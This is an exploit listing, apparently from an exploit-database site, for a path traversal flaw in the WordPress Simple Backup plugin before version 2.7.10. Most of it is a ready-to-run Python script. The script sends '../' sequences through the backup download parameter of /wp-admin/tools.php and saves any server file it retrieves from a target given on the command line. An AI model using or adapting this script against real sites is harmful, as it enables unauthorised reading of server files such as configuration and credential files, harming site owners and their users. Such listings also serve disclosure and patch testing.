WordPress Simple Backup Path Traversal / Arbitrary File Download
WordPress Simple Backup plugin versions prior to 2.7.10 suffer from an arbitrary file download vulnerability reachable via path traversal.
# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal# Date: 2024-03-06# Exploit Author: Ven3xy# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip# Version: 2.7.10# Tested on: Linuximport sysimport requestsfrom urllib.parse import urljoinimport timedef exploit(target_url, file_name, depth): traversal = '../' * depth exploit_url = urljoin(target_url, '/wp-admin/tools.php') params = { 'page': 'backup_manager', 'download_backup_file': f'{traversal}{file_name}' } response = requests.get(exploit_url, params=params) if response.status_code == 200 and response.headers.get('Content-Disposition') \ and 'attachment; filename' in response.headers['Content-Disposition'] \ and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0: print(response.text) # Replace with the desired action for the downloaded content file_path = f'simplebackup_{file_name}' with open(file_path, 'wb') as file: file.write(response.content) print(f'File saved in: {file_path}') else: print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python exploit.py <target_url> <file_name> <depth>") sys.exit(1) target_url = sys.argv[1] file_name = sys.argv[2] depth = int(sys.argv[3]) print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n") time.sleep(5) exploit(target_url, file_name, depth)